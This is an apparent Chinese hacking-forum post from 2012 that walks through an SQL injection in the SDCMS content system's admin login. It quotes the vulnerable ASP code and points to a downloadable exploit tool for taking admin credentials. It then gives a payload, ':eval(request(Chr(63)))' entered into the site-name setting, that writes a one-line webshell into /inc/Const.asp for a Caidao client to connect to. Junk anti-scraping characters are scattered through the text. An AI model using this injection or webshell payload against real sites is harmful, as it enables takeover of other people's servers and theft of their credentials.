作者:T00LS 鬼哥1 j0 F7 e/ n! n
漏洞文件:后台目录/index.asp/ m) ]2 C) m1 d* \
3 a0 d0 I: g! RSub Check
5 D. p4 H; T% |, q Dim username,password,code,getcode,Rs* j" I1 ]; `5 G: ^. E2 _& _
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub5 Y( w. L$ E5 a# s, H3 b! n# {
username=FilterText(Trim(Request.Form("username")),1). u+ B. x& y. _' C
password=FilterText(Trim(Request.Form("password")),1)7 k' E6 h! i% m. i
code=Trim(Request.Form("yzm"))
/ @' m/ [$ \$ M% M$ H getcode=Session("SDCMSCode")2 R M0 v- F. W' y) J( s1 x R
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died) o$ [* T; C* B$ Q9 ]
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
8 s" ^, z5 K% U" r( q- q0 M IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
5 U5 q) }8 n) ^9 X1 \) @ IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied% j$ k; F$ J7 [% ]/ c
IF username="" or password="" Then
7 R# G6 h# V& L Echo "用户名或密码不能为空"ied& }( v& h% S( p( O, q* G
Else" `$ W9 Z8 I$ s* h B5 `+ {
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")/ x3 j- n4 V* u( r- d) x8 e
IF Rs.Eof Then/ n {+ x3 s8 }* R3 T
AddLog username,GetIp,"登录失败",1
! j8 `9 g- R, O( C+ Z0 }4 A Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"* f, _+ _ G" E8 @( P
Else* I0 K- k, L! t& Q. I3 f
Add_Cookies "sdcms_id",Rs(0)) z% D) J) `! y- x: U
Add_Cookies "sdcms_name",username) `# a! e$ h5 }, K# M. q0 R
Add_Cookies "sdcms_pwd",Rs(2)
6 r8 s/ d4 r- y% i Add_Cookies "sdcms_admin",Rs(3)0 W/ C4 b; c5 ]
Add_Cookies "sdcms_alllever",Rs(4)4 [, `4 t Y H# M6 Y5 Z, `
Add_Cookies "sdcms_infolever",Rs(5). X% P1 K% Y* h8 [$ d' X% m
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
# W/ E7 h @, u6 \ AddLog username,GetIp,"登录成功",1
& R9 s7 b3 i! H '自动删除30天前的Log记录, o% ]$ @% e/ [4 e! G. `% Q
IF Sdcms_DataType Then c1 S$ c8 R" U& l
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
/ J: [3 Y/ O# g2 e Else
g; o9 y3 Z& l/ V) @ Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30"); {9 G( E! l0 f3 {8 o1 b
End IF
, D" o- W; d) g4 X7 }4 P Go("sdcms_index.asp")
0 g! H* J- a& V6 e. d# W End IF# N8 ]- J; f3 Q2 H& K
Rs.Close5 Z* w- X2 h7 T8 a4 m; f7 i
Set Rs=Nothing
7 Z3 h' j. Z- y5 p, A/ H3 p End IF9 P ]4 N; r. N; C X! N8 O& k4 P
End Sub
5 e) ^( e# t+ z* J1 g5 T/ g7 K9 A: t. i) L* l
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
; I* ^7 B4 S X5 A/ T. O
: @# l/ L, [4 k6 F2 LFunction FilterText(ByVal t0,ByVal t1)
* j3 Y' R O# k1 G4 E3 W5 y IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function& z' X, V3 Y, K
t0=Trim(t0)% Q! h2 c( f7 h( f7 J, S. Y
Select Case t1
9 I @: p( `" T. F Case "1"
6 \5 X# L6 z9 K/ D3 G& e1 | t0=Replace(t0,Chr(32),"")
1 ] V! S3 \1 x d$ ?9 C t0=Replace(t0,Chr(13),"")& K( _" k" p2 {( E0 o: N! r
t0=Replace(t0,Chr(10)&Chr(10),"")
: |* P2 D" ~" c* B' H' j t0=Replace(t0,Chr(10),"")
6 D$ { H& V3 D6 d6 a+ A Case "2"
8 O# @$ [, M# r4 m0 X3 y t0=Replace(t0,Chr(8),"")'回格
- a$ T6 _, M' ^( v( J6 Y ?. {' N t0=Replace(t0,Chr(9),"")'tab(水平制表符)1 v$ n) e Y+ O, d. i
t0=Replace(t0,Chr(10),"")'换行/ Q @8 W6 {0 P U. ?8 |7 U( x
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)% @# r: ~) q+ Y9 t' j8 N- i" _
t0=Replace(t0,Chr(12),"")'换页# o+ r- J' T _' W6 L- T
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
0 h! f, G \2 r- I7 i7 S" @: Y t0=Replace(t0,Chr(22),"")
" F3 z$ J/ o. {) z$ B* j( N t0=Replace(t0,Chr(32),"")'空格 SPACE* a9 P" U! Y9 D( t( J9 R0 _6 Q, ?
t0=Replace(t0,Chr(33),"")'!1 O) }; J& O5 x. e, s# v0 P
t0=Replace(t0,Chr(34),"")'"2 f: f1 x. u7 K) @; k+ I' o. u
t0=Replace(t0,Chr(35),"")'#
/ h6 `5 [- F" G9 P5 P t0=Replace(t0,Chr(36),"")'$
' d/ H$ ?4 _* a$ v4 ? t0=Replace(t0,Chr(37),"")'%% `: h! H+ H" z- g/ J s$ I
t0=Replace(t0,Chr(38),"")'&
! r) k: d1 Y2 s/ M. T0 C( ~ t0=Replace(t0,Chr(39),"")''
6 a; y0 q# v' d+ u9 x8 s t0=Replace(t0,Chr(40),"")'(4 `0 b* Z6 f$ B7 Q& k
t0=Replace(t0,Chr(41),"")')
2 ?3 r8 b+ z8 p t0=Replace(t0,Chr(42),"")'*
& l* q6 W+ o( ~( ]" u/ W$ f: e t0=Replace(t0,Chr(43),"")'+
6 e, q5 |7 X; Q4 P t0=Replace(t0,Chr(44),"")',& I1 n- b9 S$ C( V9 g# M- |
t0=Replace(t0,Chr(45),"")'-
5 C+ g' R) ?7 P A5 P t0=Replace(t0,Chr(46),"")'.* V( q* m9 }1 t2 s8 s. S; C- k. h" m
t0=Replace(t0,Chr(47),"")'/. g, k* H# A+ s! A' y2 x1 |
t0=Replace(t0,Chr(58),"")':7 @# J7 t7 J2 b" I; x" f) ]2 L: D
t0=Replace(t0,Chr(59),"")';
+ P0 O8 y; B0 v/ e5 ]5 k t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
. l7 B! L: y# A0 r( R t0=Replace(t0,Chr(63),"")'?; T$ V R. l$ ]$ P
t0=Replace(t0,Chr(64),"")'@
8 L2 s6 b/ g- I8 A% Y t0=Replace(t0,Chr(91),"")'\
/ R' G( a- w' Z) j# h% r1 o t0=Replace(t0,Chr(92),"")'\
5 {2 Y4 o. ^# E! w t0=Replace(t0,Chr(93),"")']0 p/ U% M9 o/ {& |0 q4 N2 n- f7 T
t0=Replace(t0,Chr(94),"")'^' Z- Z% J* ]8 L% y Q+ {9 d
t0=Replace(t0,Chr(95),"")'_
4 _' ~. v% X; R7 w1 \% ~ t0=Replace(t0,Chr(96),"")'`: B: D5 N6 o+ o$ h% }
t0=Replace(t0,Chr(123),"")'{
* `" d) ?, r. [% c0 u2 } t0=Replace(t0,Chr(124),"")'|
' g) Y4 [- l1 } t0=Replace(t0,Chr(125),"")'}
5 V3 E; N3 \- Q, d1 R t0=Replace(t0,Chr(126),"")'~' w% q* w4 U. x+ X% h/ c
Case Else, `% L1 g5 b# [# t
t0=Replace(t0, "&", "&")
/ k; X; A; f0 {- M; o$ J2 U# F t0=Replace(t0, "'", "'")% j, {$ q) e1 v
t0=Replace(t0, """", """)
6 E2 B) X% w2 b N) A* X t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
4 Q5 C5 { W3 L i# n& J End Select0 [3 U. s: F* Z5 N9 q
IF Instr(Lcase(t0),"expression")>0 Then2 K5 X4 z, `6 M* w
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
$ `7 p2 v0 V& K5 u End If; c$ U) g9 u# a
FilterText=t0
% `/ S8 Z( N- m3 L7 Y3 [End Function/ F9 n0 J7 k5 o& \9 U, y$ c7 [3 t
( V3 G: T9 H6 _3 ~- |0 k4 N+ ?看到没。直接参数是1 只过滤
- ?! F' H5 H4 c t0=Replace(t0,Chr(32)," "): d8 J$ d( |5 n
t0=Replace(t0,Chr(13),"")
. x# C$ v* s+ X5 d M% U$ i, i t0=Replace(t0,Chr(10)&Chr(10),"
- i! a; @; t7 q! C"). z4 v3 W6 V! h1 N! m
t0=Replace(t0,Chr(10),"
# m9 E, J0 ~+ X/ r4 c9 G")* Y4 t: u* n7 n
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!! | Q! v" `0 `+ p3 t% I
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP( f% Z% ], X* F
! ~( V$ u" y/ a+ Q; ^: S
测试:8 r- O& W: ?8 e' F7 @
9 y/ u3 A- o0 W# b: k! U$ g$ R( r1 c1 _
现在输入工具上验证码,然后点OK
! d7 ]" b/ }7 E$ w# i0 A" [: p- n- ~& ]) z7 B: e8 [# |3 {
9 S$ Y" X5 J" L& D( V7 ?% v4 ?看到我们直接进入后台管理界面了,呵呵! c3 D, _: ~0 b" U6 `
8 W% f7 V% y9 O0 ^/ X. g' z$ j
( E( {! v/ ?& N, Z5 a, R+ U/ B# |0 n
这样直接进入后台了。。。。% y7 ]1 e' X- S* T7 H
. {& c4 M! p$ R) Y) c
7 N' Y# ^4 b# B r
4 p5 {- B3 A- J, `2 k% [SDCMS提权:* Z* q1 E$ |' D: ~9 W' A! o
- m; y4 v1 c/ i G) g
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
( F# D9 S/ D& Y1 x, q/ y2 b- m2 E& Y- z1 V/ E. C+ b, w5 |) j
' b7 \$ e6 L4 m9 {( F8 H0 E' S
. M+ r* r- K5 v6 j7 ]4 s1 y) ?: o5 ?OK,现在用菜刀连接下!9 R1 y" j3 \# N$ J/ U" }$ n
5 g2 C( G& @: @5 U
/ e" @/ l8 ?+ U9 _8 u. L: N
- O" D! M% k+ ~) T $ j. v0 T$ S! \0 [3 H; i
8 O) C8 S4 d* a. O& P
|
发表于 2012-11-9 20:57:02
收藏
支持
反对